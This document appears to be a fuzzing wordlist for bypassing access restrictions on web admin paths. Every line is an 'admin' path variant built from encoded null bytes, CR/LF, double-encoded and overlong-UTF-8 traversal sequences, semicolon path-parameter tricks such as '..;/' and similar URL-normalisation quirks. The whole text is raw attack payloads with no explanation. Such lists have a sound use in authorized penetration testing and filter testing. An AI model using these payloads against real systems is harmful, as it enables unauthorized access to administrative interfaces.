admin/..%00
admin/..%01
admin/..%0a
admin/..%0d
admin/..%09
admin/...
admin/..%00
admin/..%01
admin/..%0a
admin/..%0d
admin/..%09
admin/~root
admin/~admin
admin/%20/
admin/%2e%2e/
admin/%252e%252e/
admin/%c0%af/
admin/%e0%80%af
admin/?
admin?
admin??
admin??
admin/?/
admin/??
admin/??/
admin/..
admin/../
admin/./
admin/.
admin/.//
admin/*
admin//*
admin/%2f
admin/%2f/
admin/%20
admin/%20/
admin/%09
admin/%09/
admin/%0a
admin/%0a/
admin/%0d
admin/%0d/
admin/%25
admin/%25/
admin/%23
admin/%23/
admin/%26
admin/%3f
admin/%3f/
admin/%26/
admin/#
admin/#/
admin/#/./
./admin
./admin/
..;/admin
..;/admin/
.;/admin
.;/admin/
;/admin
;/admin/
/;//admin
/;//admin/
admin/./
%2e/admin
%2e/admin/
%20/admin/%20
%20/admin/%20/
admin/..;/
admin.json
admin/.json
admin..;/
admin;/
admin%00
admin.css
admin.html
admin?id=1
admin~
admin#
admin/~
admin/°/
admin/&
admin/-
admin\/\/
admin/..%3B/
admin/;%2f..%2f..%2f
admin
admin/
admin/..\;/
*/admin
*/admin/
/admin//
//admin///
./admin/./
admin%00
admin/%00
